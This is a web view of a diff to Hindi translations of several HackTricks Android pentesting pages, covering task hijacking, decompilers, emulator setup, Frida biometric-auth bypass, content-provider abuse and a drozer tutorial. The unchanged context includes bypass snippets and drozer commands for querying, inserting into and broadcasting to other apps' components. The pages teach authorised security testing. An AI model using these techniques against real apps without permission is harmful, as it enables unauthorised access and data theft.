- **MDM समाधान** मोबाइल उपकरणों के लिए **निगरानी और सुरक्षा** प्रदान करते हैं **Device Administration API** के माध्यम से। इन्हें मोबाइल उपकरणों को प्रभावी ढंग से प्रबंधित और सुरक्षित करने के लिए एक Android ऐप के इंस्टॉलेशन की आवश्यकता होती है। मुख्य कार्यों में **पासवर्ड नीतियों को लागू करना**, **स्टोरेज एन्क्रिप्शन को अनिवार्य करना**, और **दूरस्थ डेटा मिटाने की अनुमति देना** शामिल है, जो मोबाइल उपकरणों पर व्यापक नियंत्रण और सुरक्षा सुनिश्चित करता है।
```java
// Example of enforcing a password policy with MDM
DevicePolicyManager dpm = (DevicePolicyManager) getSystemService(Context.DEVICE_POLICY_SERVICE);

8
src/mobile-pentesting/android-app-pentesting/android-task-hijacking.md
View File

@ -9,9 +9,9 @@ Android में, एक **कार्य** मूल रूप से गत
गतिविधि संक्रमण का त्वरित विश्लेषण यहाँ है:
- **गतिविधि 1** अग्रभूमि में एकमात्र गतिविधि के रूप में शुरू होती है।
- **गतिविधि 2** को लॉन्च करने से **गतिविधि 1** बैक स्टैक में धकेल दी जाती है, **गतिविधि 2** को अग्रभूमि में लाते हुए।
- **गतिविधि 3** शुरू करने से **गतिविधि 1** और **गतिविधि 2** स्टैक में और पीछे चली जाती हैं, **गतिविधि 3** अब सामने होती है।
- **गतिविधि 3** को बंद करने से **गतिविधि 2** फिर से अग्रभूमि में आ जाती है, जो Android के सुव्यवस्थित कार्य नेविगेशन तंत्र को प्रदर्शित करत है।
- **गतिविधि 2** को लॉन्च करने से **गतिविधि 1** को बैक स्टैक में धकेल दिया जाता है, **गतिविधि 2** को अग्रभूमि में लाते हुए।
- **गतिविधि 3** शुरू करने से **गतिविधि 1** और **गतिविधि 2** को स्टैक में और पीछे ले जाया जाता है, **गतिविधि 3** अब सामने होती है।
- **गतिविधि 3** को बंद करने से **गतिविधि 2** को फिर से अग्रभूमि में लाया जाता है, जो Android के सुव्यवस्थित कार्य नेविगेशन तंत्र को प्रदर्शित करत है।
![https://developer.android.com/images/fundamentals/diagram_backstack.png](<../../images/image (698).png>)
@ -19,7 +19,7 @@ Android में, एक **कार्य** मूल रूप से गत
### कार्य संबंध और लॉन्च मोड का अवलोकन
Android अनुप्रयोगों में, **कार्य संबंध** एक गतिविधि के पसंदीदा कार्य को निर्दिष्ट करता है, जो आमतौर पर ऐप के पैकेज नाम के साथ मेल खाता है। यह सेटअप हमले को प्रदर्शित करने के लिए एक प्रमाण-ऑफ-कॉन्सेप्ट (PoC) ऐप बनाने में महत्वपूर्ण है।
Android अनुप्रयोगों में, **कार्य संबंध** एक गतिविधि के पसंदीदा कार्य को निर्दिष्ट करता है, जो आमतौर पर ऐप के पैकेज नाम के साथ मेल खाता है। यह सेटअप हमले को प्रदर्शित करने के लिए एक प्रमाण-ऑफ-ध-concept (PoC) ऐप बनाने में सहायक है।
### लॉन्च मोड

8
src/mobile-pentesting/android-app-pentesting/apk-decompilers.md
View File

@ -6,11 +6,11 @@
### [JD-Gui](https://github.com/java-decompiler/jd-gui)
पायनियरिंग GUI Java decompiler के रूप में, **JD-Gui** आपको APK फ़ाइलों के भीतर Java कोड की जांच करने की अनुमति देता है। इसका उपयोग करना सीधा है; APK प्राप्त करने के बाद, कोड की जांच के लिए इसे JD-Gui के साथ खोलें।
पायनियरिंग GUI Java decompiler के रूप में, **JD-Gui** आपको APK फ़ाइलों के भीतर Java कोड की जांच करने की अनुमति देता है। इसका उपयोग करना सीधा है; APK प्राप्त करने के बाद, बस इसे JD-Gui के साथ खोलें और कोड की जांच करें।
### [Jadx](https://github.com/skylot/jadx)
**Jadx** Android अनुप्रयोगों से Java कोड को डिकंपाइल करने के लिए एक उपयोगकर्ता-अनुकूल इंटरफ़ेस प्रदान करता है। विभिन्न प्लेटफार्मों पर इसके उपयोग में आसानी के लिए इसकी सिफारिश की जाती है।
**Jadx** Android अनुप्रयोगों से Java कोड को डिकंपाइल करने के लिए एक उपयोगकर्ता-अनुकूल इंटरफ़ेस प्रदान करता है। यह विभिन्न प्लेटफार्मों पर उपयोग में आसानी के लिए अनुशंसित है।
- GUI लॉन्च करने के लिए, बिन निर्देशिका में जाएं और निष्पादित करें: `jadx-gui`
- कमांड-लाइन उपयोग के लिए, एक APK को डिकंपाइल करें: `jadx app.apk`
@ -22,7 +22,7 @@
### [Bytecode-Viewer](https://github.com/Konloch/bytecode-viewer/releases)
**Bytecode-Viewer** के साथ, आप कई डिकंपाइलरों का उपयोग करके APK फ़ाइलों का विश्लेषण कर सकते हैं। डाउनलोड करने के बाद, Bytecode-Viewer चलाएँ, अपनी APK लोड करें, और समानांतर विश्लेषण के लिए आप जिन डिकंपाइलरों का उपयोग करना चाहते हैं, उन्हें चुनें।
**Bytecode-Viewer** के साथ, आप कई डिकंपाइलरों का उपयोग करके APK फ़ाइलों का विश्लेषण कर सकते हैं। डाउनलोड करने के बाद, Bytecode-Viewer चलाएँ, अपनी APK लोड करें, और एक साथ विश्लेषण के लिए आप जिन डिकंपाइलरों का उपयोग करना चाहते हैं, उन्हें चुनें।
### [Enjarify](https://github.com/Storyyeller/enjarify)
@ -57,6 +57,6 @@
### [frida-DEXdump](https://github.com/hluwa/frida-dexdump)
यह उपकरण मेमोरी में चल रहे APK का DEX डंप करने के लिए उपयोग किया जा सकता है। यह स्थिर ऑबफस्केशन को हराने में मदद करता है जो एप्लिकेशन के मेमोरी में निष्पादित होने पर हटा दिया जाता है।
यह उपकरण मेमोरी में चल रहे APK का DEX डंप करने के लिए उपयोग किया जा सकता है। यह स्थिर ऑबफस्केशन को हराने में मदद करता है जो एप्लिकेशन को मेमोरी में निष्पादित करते समय हटा दिया जाता है।
{{#include ../../banners/hacktricks-training.md}}

6
src/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md
View File

@ -18,7 +18,7 @@ Mac में आप **SDK टूल डाउनलोड कर सकते
brew tap homebrew/cask
brew install --cask android-sdk
```
या **Android Studio GUI** से जैसा कि [https://stackoverflow.com/questions/46402772/failed-to-install-android-sdk-java-lang-noclassdeffounderror-javax-xml-bind-a](https://stackoverflow.com/questions/46402772/failed-to-install-android-sdk-java-lang-noclassdeffounderror-javax-xml-bind-a) में संकेतित किया गया है, जो उन्हें `~/Library/Android/sdk/cmdline-tools/latest/bin/` और `~/Library/Android/sdk/platform-tools/` और `~/Library/Android/sdk/emulator/` में स्थापित करेगा।
या **Android Studio GUI** से जैसा कि [https://stackoverflow.com/questions/46402772/failed-to-install-android-sdk-java-lang-noclassdeffounderror-javax-xml-bind-a](https://stackoverflow.com/questions/46402772/failed-to-install-android-sdk-java-lang-noclassdeffounderror-javax-xml-bind-a) में संकेतित है, जो उन्हें `~/Library/Android/sdk/cmdline-tools/latest/bin/` और `~/Library/Android/sdk/platform-tools/` और `~/Library/Android/sdk/emulator/` में स्थापित करेगा।
Java समस्याओं के लिए:
```java
@ -52,7 +52,7 @@ _**select** वह फोन जिसे आप उपयोग करना
<figure><img src="../../images/image (1145).png" alt="" width="375"><figcaption></figcaption></figure>
तो, इसे चुनें और यदि यह डाउनलोड नहीं हुआ है तो नाम के बगल में _**Download**_ प्रतीक पर क्लिक करें (**अब इमेज डाउनलोड होने तक प्रतीक्षा करें)।**\
एक बार इमेज डाउनलोड हो जाने के बाद, बस **`Next`** और **`Finish`** का चयन करें।
एक बार इमेज डाउनलोड हो जाने के बाद, बस **`Next`** और **`Finish`** चुनें।
वर्चुअल मशीन बनाई जाएगी। अब **हर बार जब आप AVD प्रबंधक तक पहुँचेंगे, यह मौजूद होगा**
@ -122,7 +122,7 @@ Revision: 4
C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\bin\avdmanager.bat -v create avd -k "system-images;android-28;google_apis;x86_64" -n "AVD9" -d "Nexus 5X"
```
अंतिम कमांड में **मैंने एक VM नामित** "_AVD9_" **डिवाइस** "_Nexus 5X_" और **एंड्रॉइड इमेज** "_system-images;android-28;google_apis;x86_64_" का उपयोग करके बनाया।\
अब आप **आपके द्वारा बनाए गए वर्चुअल मशीनों की सूची** प्राप्त कर सकते हैं:
अब आप **आपके द्वारा बनाए गए वर्चुअल मशीनों** की सूची देख सकते हैं:
```bash
C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\bin\avdmanager.bat list avd

8
src/mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.md
View File

@ -1,10 +1,10 @@
# बायपास बायोमेट्रिक प्रमाणीकरण (एंड्रॉइड)
# बायपास बायोमेट्रिक ऑथेंटिकेशन (एंड्रॉइड)
{{#include ../../banners/hacktricks-training.md}}
## **विधि 1 बिना क्रिप्टो ऑब्जेक्ट उपयोग के बायपास करना**
यहाँ ध्यान _onAuthenticationSucceeded_ कॉलबैक पर है, जो प्रमाणीकरण प्रक्रिया में महत्वपूर्ण है। WithSecure के शोधकर्ताओं ने एक [Frida स्क्रिप्ट](https://github.com/WithSecureLABS/android-keystore-audit/blob/master/frida-scripts/fingerprint-bypass.js) विकसित की, जो _onAuthenticationSucceeded(...)_ में NULL _CryptoObject_ के बायपास को सक्षम बनाती है। यह स्क्रिप्ट विधि के आह्वान पर फिंगरप्रिंट प्रमाणीकरण का स्वचालित बायपास करने के लिए मजबूर करती है। नीचे एक सरल स्निपेट है जो एंड्रॉइड फिंगरप्रिंट संदर्भ में बायपास को प्रदर्शित करता है, पूरी एप्लिकेशन [GitHub](https://github.com/St3v3nsS/InsecureBanking) पर उपलब्ध है।
यहाँ ध्यान _onAuthenticationSucceeded_ कॉलबैक पर है, जो ऑथेंटिकेशन प्रक्रिया में महत्वपूर्ण है। WithSecure के शोधकर्ताओं ने एक [Frida स्क्रिप्ट](https://github.com/WithSecureLABS/android-keystore-audit/blob/master/frida-scripts/fingerprint-bypass.js) विकसित की, जो _onAuthenticationSucceeded(...)_ में NULL _CryptoObject_ के बायपास की अनुमति देती है। यह स्क्रिप्ट विधि के आह्वान पर फिंगरप्रिंट ऑथेंटिकेशन का स्वचालित बायपास करने के लिए मजबूर करती है। नीचे एक सरल स्निप्पेट है जो एंड्रॉइड फिंगरप्रिंट संदर्भ में बायपास को प्रदर्शित करता है, पूरी एप्लिकेशन [GitHub](https://github.com/St3v3nsS/InsecureBanking) पर उपलब्ध है।
```javascript
biometricPrompt = new BiometricPrompt(this, executor, new BiometricPrompt.AuthenticationCallback() {
@Override
@ -49,8 +49,8 @@ frida -U -l script-to-bypass-authentication.js --no-pause -f com.generic.in
रिवर्स इंजीनियरिंग उपकरण जैसे `APKTool`, `dex2jar`, और `JD-GUI` का उपयोग एक Android एप्लिकेशन को डिकंपाइल करने, इसके स्रोत कोड को पढ़ने और इसके प्रमाणीकरण तंत्र को समझने के लिए किया जा सकता है। चरण आमतौर पर शामिल होते हैं:
1. **APK को डिकंपाइल करना**: APK फ़ाइल को एक अधिक मानव-पठनीय प्रारूप (जैसे Java कोड) में परिवर्तित करें।
2. **कोड का विश्लेषण करना**: फिंगरप्रिंट प्रमाणीकरण के कार्यान्वयन की तलाश करें और संभावित कमजोरियों की पहचान करें (जैसे बैकअप तंत्र या अनुचित मान्यता जांच)।
3. **APK को फिर से संकलित करना**: फिंगरप्रिंट प्रमाणीकरण को बायपास करने के लिए कोड को संशोधित करने के बाद, एप्लिकेशन को फिर से संकलित, साइन और परीक्षण के लिए डिवाइस पर स्थापित किया जाता है।
2. **कोड का विश्लेषण करना**: फिंगरप्रिंट प्रमाणीकरण के कार्यान्वयन की तलाश करें और संभावित कमजोरियों की पहचान करें (जैसे फॉलबैक तंत्र या अनुचित मान्यता जांच)।
3. **APK को फिर से संकलित करना**: फिंगरप्रिंट प्रमाणीकरण को बायपास करने के लिए कोड को संशोधित करने के बाद, एप्लिकेशन को फिर से संकलित किया जाता है, साइन किया जाता है, और परीक्षण के लिए डिवाइस पर स्थापित किया जाता है।
## **विधि 5 कस्टम प्रमाणीकरण उपकरणों का उपयोग करना**

13
src/mobile-pentesting/android-app-pentesting/content-protocol.md
View File

@ -1,5 +1,6 @@
{{#include ../../banners/hacktricks-training.md}}
**यह पोस्ट का सारांश है [https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/](https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/)**
### मीडिया स्टोर में फ़ाइलें सूचीबद्ध करना
@ -8,15 +9,15 @@
```bash
$ content query --uri content://media/external/file
```
एक अधिक मानव-अनुकूल आउटपुट के लिए, प्रत्येक अनुक्रमित फ़ाइल क केवल पहचानकर्ता और पथ को प्रदर्शित करना:
एक अधिक मानव-अनुकूल आउटपुट के लिए, प्रत्येक अनुक्रमित फ़ाइल क केवल पहचानकर्ता और पथ प्रदर्शित करना:
```bash
$ content query --uri content://media/external/file --projection _id,_data
```
सामग्री प्रदाता अपने निजी नामस्थान में अलग-थलग होते हैं। किसी प्रदाता तक पहुँचने के लिए विशेष `content://` URI की आवश्यकता होती है। प्रदाता तक पहुँचने के लिए पथों की जानकारी एप्लिकेशन मैनिफेस्ट या Android ढांचे के स्रोत कोड से प्राप्त की जा सकती है।
सामग्री प्रदाता अपने निजी नामस्थान में अलग-थलग होते हैं। किसी प्रदाता तक पहुँचने के लिए विशिष्ट `content://` URI की आवश्यकता होती है। किसी प्रदाता तक पहुँचने के लिए पथों की जानकारी एप्लिकेशन मैनिफेस्ट या Android ढांचे के स्रोत कोड से प्राप्त की जा सकती है।
### Chrome का सामग्री प्रदाताओं तक पहुँच
Android पर Chrome `content://` योजना के माध्यम से सामग्री प्रदाताओं तक पहुँच सकता है, जिससे यह तीसरे पक्ष के एप्लिकेशनों द्वारा निर्यातित फ़ोटो या दस्तावेज़ जैस संसाधनों तक पहुँच प्राप्त कर सकता है। इसे स्पष्ट करने के लिए, एक फ़ाइल को मीडिया स्टोर में डाला जा सकता है और फिर Chrome के माध्यम से पहुँचा जा सकता है:
Android पर Chrome `content://` योजना के माध्यम से सामग्री प्रदाताओं तक पहुँच सकता है, जिससे यह तीसरे पक्ष के एप्लिकेशनों द्वारा निर्यातित फ़ोटो या दस्तावेज़ जैस संसाधनों तक पहुँच प्राप्त कर सकता है। इसे स्पष्ट करने के लिए, एक फ़ाइल को मीडिया स्टोर में डाला जा सकता है और फिर Chrome के माध्यम से पहुँचा जा सकता है:
मीडिया स्टोर में एक कस्टम प्रविष्टि डालें:
```bash
@ -40,11 +41,11 @@ content query --uri content://media/external/file --projection _id,_data | grep
```
### Chrome CVE-2020-6516: Same-Origin-Policy Bypass
_समान मूल नीति_ (SOP) एक सुरक्षा प्रोटोकॉल है जो ब्राउज़रों में वेब पृष्ठों को विभिन्न मूलों से संसाधनों के साथ बातचीत करने से रोकता है जब तक कि इसे क्रॉस-ओरिजिन-रिसोर्स-शेयरिंग (CORS) नीति द्वारा स्पष्ट रूप से अनुमति नहीं दी जाती। इस नीति का उद्देश्य जानकारी के लीक और क्रॉस-साइट अनुरोध धोखाधड़ी को रोकना है। Chrome `content://` को एक स्थानीय योजना के रूप में मानता है, जिसका अर्थ है कि SOP नियम अधिक सख्त हैं, जहां प्रत्येक स्थानीय योजना URL को एक अलग मूल के रूप में माना जाता है।
_समान मूल नीति_ (SOP) एक सुरक्षा प्रोटोकॉल है जो ब्राउज़रों में वेब पृष्ठों को विभिन्न मूलों से संसाधनों के साथ बातचीत करने से रोकता है जब तक कि इसे क्रॉस-ओरिजिन-रिसोर्स-शेयरिंग (CORS) नीति द्वारा स्पष्ट रूप से अनुमति नहीं दी जाती। इस नीति का उद्देश्य जानकारी के लीक और क्रॉस-साइट अनुरोध धोखाधड़ी को रोकना है। Chrome `content://` को एक स्थानीय योजना के रूप में मानता है, जिसका अर्थ है कि SOP नियम अधिक सख्त होते हैं, जहां प्रत्येक स्थानीय योजना URL को एक अलग मूल के रूप में माना जाता है।
हालांकि, CVE-2020-6516 एक कमजोर बिंदु था जो Chrome में `content://` URL के माध्यम से लोड किए गए संसाधनों के लिए SOP नियमों को बायपास करने की अनुमति देता था। प्रभावी रूप से, `content://` URL से JavaScript कोड अन्य संसाधनों तक पहुँच सकता था जो `content://` URLs के माध्यम से लोड किए गए थे, जो एक महत्वपूर्ण सुरक्षा चिंता थी, विशेष रूप से Android उपकरणों पर जो Android 10 से पहले के संस्करण चला रहे थे, जहां स्कोप्ड स्टोरेज लागू नहीं किया गया था।
हालांकि, CVE-2020-6516 एक कमजोर बिंदु था जो Chrome में SOP नियमों को `content://` URL के माध्यम से लोड किए गए संसाधनों के लिए बायपास करने की अनुमति देता था। प्रभावी रूप से, `content://` URL से JavaScript कोड अन्य संसाधनों तक पहुँच सकता था जो `content://` URLs के माध्यम से लोड किए गए थे, जो एक महत्वपूर्ण सुरक्षा चिंता थी, विशेष रूप से Android उपकरणों पर जो Android 10 से पहले के संस्करण चला रहे थे, जहां स्कोप्ड स्टोरेज लागू नहीं किया गया था।
नीचे दिए गए प्रमाण-का-धारणा इस कमजोर बिंदु को प्रदर्शित करता है, जहां एक HTML दस्तावेज़, जिसे **/sdcard** के तहत अपलोड किया गया और मीडिया स्टोर में जोड़ा गया, अपने JavaScript में `XMLHttpRequest` का उपयोग करके मीडिया स्टोर में एक अन्य फ़ाइल की सामग्री को एक्सेस और प्रदर्शित करता है, SOP नियमों को बायपास करता है।
नीचे दिए गए प्रमाण-का-धारणा इस कमजोर बिंदु को प्रदर्शित करता है, जहां एक HTML दस्तावेज़, जिसे **/sdcard** के तहत अपलोड किया गया है और मीडिया स्टोर में जोड़ा गया है, अपने JavaScript में `XMLHttpRequest` का उपयोग करके मीडिया स्टोर में एक अन्य फ़ाइल की सामग्री को एक्सेस और प्रदर्शित करता है, SOP नियमों को बायपास करता है।
Proof-of-Concept HTML:
```xml

24
src/mobile-pentesting/android-app-pentesting/drozer-tutorial/README.md
View File

@ -19,13 +19,13 @@ pip install drozer-2.4.4-py2-none-any.whl
pip install twisted
pip install service_identity
```
डाउनलोड करें और [latest releases](https://github.com/mwrlabs/drozer/releases) से drozer APK इंस्टॉल करें। इस समय यह [this](https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk) है।
drozer APK को [latest releases](https://github.com/mwrlabs/drozer/releases) से डाउनलोड और इंस्टॉल करें। इस समय यह [this](https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk) है।
```bash
adb install drozer.apk
```
### सर्वर शुरू करना
एजेंट पोर्ट 31415 पर चल रहा है, हमें [port forward](https://en.wikipedia.org/wiki/Port_forwarding) करना होगा ताकि Drozer Client और एजेंट के बीच संचार स्थापित किया जा सके, इसे करने के लिए यहां कमांड है:
एजेंट पोर्ट 31415 पर चल रहा है, हमें [port forward](https://en.wikipedia.org/wiki/Port_forwarding) करना होगा ताकि Drozer क्लाइंट और एजेंट के बीच संचार स्थापित किया जा सके, इसे करने के लिए यहां कमांड है:
```bash
adb forward tcp:31415 tcp:31415
```
@ -46,8 +46,8 @@ drozer console connect
| **shell** | एजेंट के संदर्भ में डिवाइस पर एक इंटरैक्टिव लिनक्स शेल शुरू करें। |
| **clean** | एंड्रॉइड डिवाइस पर drozer द्वारा संग्रहीत अस्थायी फ़ाइलें हटा दें। |
| **load** | drozer कमांड वाले फ़ाइल को लोड करें और उन्हें अनुक्रम में निष्पादित करें। |
| **module** | इंटरनेट से अतिरिक्त drozer मॉड्यूल खोजें और स्थापित करें। |
| **unset** | एक नामित चर को हटा दें जिसे drozer किसी भी लिनक्स शेल में पास करता है जिसे यह उत्पन्न करता है। |
| **module** | इंटरनेट से अतिरिक्त drozer मॉड्यूल खोजें और स्थापित करें। |
| **unset** | एक नामित चर को हटा दें जिसे drozer किसी भी लिनक्स शेल में पास करता है जिसे यह उत्पन्न करता है। |
| **set** | एक मान को एक चर में संग्रहीत करें जिसे drozer द्वारा उत्पन्न किसी भी लिनक्स शेल में पर्यावरणीय चर के रूप में पास किया जाएगा। |
| **shell** | एजेंट के संदर्भ में डिवाइस पर एक इंटरैक्टिव लिनक्स शेल शुरू करें। |
| **run MODULE** | एक drozer मॉड्यूल निष्पादित करें |
@ -56,7 +56,7 @@ drozer console connect
### पैकेज
**नाम** का पता लगाएं जो नाम के भाग द्वारा फ़िल्टर किया गया है:
**नाम** खोजें जो नाम के भाग द्वारा फ़िल्टर किया गया है:
```bash
dz> run app.package.list -f sieve
com.mwr.example.sieve
@ -130,7 +130,7 @@ adb shell am start -n com.example.demo/com.example.test.MainActivity
```
### सामग्री प्रदाता
यह पोस्ट यहाँ इतनी बड़ी थी कि **आप इसे** [**यहाँ अपनी पृष्ठ पर एक्सेस कर सकते हैं**](exploiting-content-providers.md).
यह पोस्ट यहाँ रखने के लिए इतनी बड़ी थी कि **आप** [**इसे अपनी पृष्ठ पर यहाँ एक्सेस कर सकते हैं**](exploiting-content-providers.md).
### सेवाएँ
@ -138,7 +138,7 @@ adb shell am start -n com.example.demo/com.example.test.MainActivity
```markup
<service android:name=".AuthService" android:exported="true" android:process=":remote"/>
```
कोड के अंदर **check** करें कि \*\*`handleMessage`\*\* फ़ंक्शन **receive** करेगा **message**:
कोड के अंदर **check** करें कि \*\*`handleMessage`\*\* फ़ंक्शन **message** को **receive** करेगा:
![](<../../../images/image (82).png>)
@ -177,17 +177,17 @@ run app.service.send com.mwr.example.sieve com.mwr.example.sieve.AuthService --m
```
![](<../../../images/image (647).png>)
### Broadcast Receivers
### ब्रॉडकास्ट रिसीवर्स
**Android बुनियादी जानकारी अनुभाग में आप देख सकते हैं कि Broadcast Receiver क्या है**।
**एंड्रॉइड बेसिक जानकारी अनुभाग में आप देख सकते हैं कि ब्रॉडकास्ट रिसीवर क्या है**।
इन Broadcast Receivers का पता लगाने के बाद आपको **उनका कोड** चेक करना चाहिए। विशेष ध्यान दें **`onReceive`** फ़ंक्शन पर क्योंकि यह प्राप्त संदेशों को संभाल रहा होगा।
इन ब्रॉडकास्ट रिसीवर्स का पता लगाने के बाद आपको **उनका कोड** चेक करना चाहिए। विशेष ध्यान दें **`onReceive`** फ़ंक्शन पर क्योंकि यह प्राप्त संदेशों को संभाल रहा होगा।
#### **सभी** ब्रॉडकास्ट रिसीवर्स का पता लगाएं
```bash
run app.broadcast.info #Detects all
```
#### क ऐप के ब्रॉडकास्ट रिसीवर्स की जांच करें
#### किसी ऐप के ब्रॉडकास्ट रिसीवर्स की जांच करें
```bash
#Check one negative
run app.broadcast.info -a jakhar.aseem.diva
@ -229,7 +229,7 @@ run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --compo
### Is debuggeable
एक प्रोडक्शन APK कभी भी डिबग करने योग्य नहीं होना चाहिए।\
इसका मतलब है कि आप **जावा डिबगर** को चल रहे एप्लिकेशन से जोड़ सकते हैं, इसे रन टाइम में निरीक्षण कर सकते हैं, ब्रेकपॉइंट सेट कर सकते हैं, कदम से कदम आगे बढ़ सकते हैं, वेरिएबल के मान इकट्ठा कर सकते हैं और यहां तक कि उन्हें बदल भी सकते हैं।[ InfoSec institute has an excellent article](../exploiting-a-debuggeable-applciation.md) जब आपका एप्लिकेशन डिबग करने योग्य हो और रनटाइम कोड इंजेक्ट करने पर गहराई से खुदाई करने के लिए।
इसका मतलब है कि आप **जावा डिबगर** को चल रहे एप्लिकेशन से जोड़ सकते हैं, इसे रन टाइम में निरीक्षण कर सकते हैं, ब्रेकपॉइंट सेट कर सकते हैं, कदम से कदम आगे बढ़ सकते हैं, वेरिएबल के मान इकट्ठा कर सकते हैं और यहां तक कि उन्हें बदल भी सकते हैं।[ InfoSec institute has an excellent article](../exploiting-a-debuggeable-applciation.md) जब आपका एप्लिकेशन डिबग करने योग्य होता है और रनटाइम कोड इंजेक्ट करने पर गहराई से खुदाई करने के लिए।
जब एक एप्लिकेशन डिबग करने योग्य होता है, तो यह मैनिफेस्ट में दिखाई देगा:
```xml

18
src/mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md
View File

@ -6,7 +6,7 @@
## Intro
डेटा **एक एप्लिकेशन से अन्य एप्लिकेशनों को** एक घटक के माध्यम से अनुरोध पर प्रदान किया जाता है जिसे **कंटेंट प्रोवाइडर** कहा जाता है। इन अनुरोधों का प्रबंधन **ContentResolver class** के तरीकों के माध्यम से किया जाता है। कंटेंट प्रोवाइडर अपने डेटा को विभिन्न स्थानों पर संग्रहीत कर सकते हैं, जैसे कि **डेटाबेस**, **फाइलें**, या एक **नेटवर्क** पर।
डेटा **एक एप्लिकेशन से अन्य एप्लिकेशनों को** एक घटक के माध्यम से अनुरोध पर **सप्लाई** किया जाता है जिसे **कंटेंट प्रोवाइडर** कहा जाता है। इन अनुरोधों का प्रबंधन **ContentResolver class** के तरीकों के माध्यम से किया जाता है। कंटेंट प्रोवाइडर अपने डेटा को विभिन्न स्थानों पर स्टोर कर सकते हैं, जैसे कि **डेटाबेस**, **फाइलें**, या एक **नेटवर्क** पर।
_Manifest.xml_ फ़ाइल में, कंटेंट प्रोवाइडर की घोषणा आवश्यक है। उदाहरण के लिए:
```xml
@ -14,7 +14,7 @@ _Manifest.xml_ फ़ाइल में, कंटेंट प्रोवा
<path-permission android:readPermission="com.mwr.example.sieve.READ_KEYS" android:writePermission="com.mwr.example.sieve.WRITE_KEYS" android:path="/Keys"/>
</provider>
```
`content://com.mwr.example.sieve.DBContentProvider/Keys` तक पहुँचने के लिए `READ_KEYS` अनुमति आवश्यक है। यह ध्यान देने योग्य है कि `/Keys/` पथ निम्नलिखित अनुभाग में उपलब्ध है, जो डेवलपर की गलती के कारण सुरक्षित नहीं है, जिसने `/Keys` को सुरक्षित किया लेकिन `/Keys/` को घोषित किया।
`content://com.mwr.example.sieve.DBContentProvider/Keys` तक पहुँचने के लिए `READ_KEYS` अनुमति आवश्यक है। यह ध्यान देने योग्य है कि `/Keys/` पथ निम्नलिखित अनुभाग में उपलब्ध है, जो डेवलपर की एक गलती के कारण सुरक्षित नहीं है, जिसने `/Keys` को सुरक्षित किया लेकिन `/Keys/` को घोषित किया।
**शायद आप निजी डेटा तक पहुँच सकते हैं या कुछ कमजोरियों (SQL Injection या Path Traversal) का लाभ उठा सकते हैं।**
@ -40,7 +40,7 @@ Content Provider: com.mwr.example.sieve.FileBackupProvider
Multiprocess Allowed: True
Grant Uri Permissions: False
```
यह संभव है कि **DBContentProvider** तक पहुँचने के लिए URIs को “_content://_” से शुरू किया जाए। यह दृष्टिकोण Drozer के उपयोग से प्राप्त अंतर्दृष्टियों पर आधारित है, जहाँ महत्वपूर्ण जानकारी _/Keys_ निर्देशिका में स्थित थी।
यह संभव है कि **DBContentProvider** तक पहुँचने के लिए URIs को “_content://_” से शुरू किया जाए। यह दृष्टिकोण Drozer का उपयोग करने से प्राप्त अंतर्दृष्टियों पर आधारित है, जहाँ महत्वपूर्ण जानकारी _/Keys_ निर्देशिका में स्थित थी।
Drozer **कई URIs का अनुमान लगा सकता है और कोशिश कर सकता है**:
```
@ -58,7 +58,7 @@ content://com.mwr.example.sieve.DBContentProvider/Passwords/
![](<../../../images/image (121) (1) (1) (1).png>)
इसके अलावा, यदि आप पूर्ण क्वेरीज़ नहीं खोज पा रहे हैं, तो आप **देख सकते हैं कि ContentProvider द्वारा कौन से नाम घोषित किए गए हैं** `onCreate` विधि पर:
इसके अलावा, यदि आप पूर्ण क्वेरीज़ नहीं खोज पा रहे हैं तो आप **देख सकते हैं कि ContentProvider द्वारा कौन से नाम घोषित किए गए हैं** `onCreate` विधि पर:
![](<../../../images/image (564).png>)
@ -66,14 +66,14 @@ content://com.mwr.example.sieve.DBContentProvider/Passwords/
## **डेटाबेस-समर्थित कंटेंट प्रोवाइडर**
संभवतः अधिकांश Content Providers का उपयोग **डेटाबेस** के लिए **इंटरफेस** के रूप में किया जाता है। इसलिए, यदि आप इसे एक्सेस कर सकते हैं, तो आप **जानकारी निकालने, अपडेट करने, डालने और हटाने** में सक्षम हो सकते हैं।\
संभवतः अधिकांश Content Providers का उपयोग **डेटाबेस** के लिए **इंटरफेस** के रूप में किया जाता है। इसलिए, यदि आप इसे एक्सेस कर सकते हैं तो आप **जानकारी निकालने, अपडेट करने, डालने और हटाने** में सक्षम हो सकते हैं।\
जांचें कि क्या आप **संवेदनशील जानकारी** तक पहुँच सकते हैं या इसे **अधिकार प्राधिकरण** तंत्र को बायपास करने के लिए बदलने की कोशिश करें।
Content Provider के कोड की जांच करते समय **देखें** कि क्या **फंक्शंस** नामित हैं जैसे: _query, insert, update और delete_:
![](<../../../images/image (887).png>)
![](<../../../images/image (254) (1) (1) (1) (1) (1) (1) (1).png>)
![](<../../../images/image (254) (1) (1) (1) (1) (1) (1).png>)
क्योंकि आप उन्हें कॉल करने में सक्षम होंगे
@ -89,13 +89,13 @@ email: incognitoguy50@gmail.com
```
### Insert content
डेटाबेस को क्वेरी करते समय आप **कॉलम के नाम** जानेंगे, फिर, आप DB में डेटा डालने में सक्षम होंगे:
डेटाबेस को क्वेरी करके आप **कॉलम के नाम** जानेंगे, फिर, आप DB में डेटा डालने में सक्षम होंगे:
![](<../../../images/image (98).png>)
![](<../../../images/image (173).png>)
_ध्यान दें कि इनसर्ट और अपडेट में आप --string का उपयोग स्ट्रिंग को इंगित करने के लिए, --double को डबल को इंगित करने के लिए, --float, --integer, --long, --short, --boolean का उपयोग कर सकते हैं_
_ध्यान दें कि इनसर्ट और अपडेट में आप --string का उपयोग स्ट्रिंग को इंगित करने के लिए, --double को डबल को इंगित करने के लिए, --float, --integer, --long, --short, --boolean के लिए कर सकते हैं_
### Update content
@ -109,7 +109,7 @@ _ध्यान दें कि इनसर्ट और अपडेट म
### **SQL Injection**
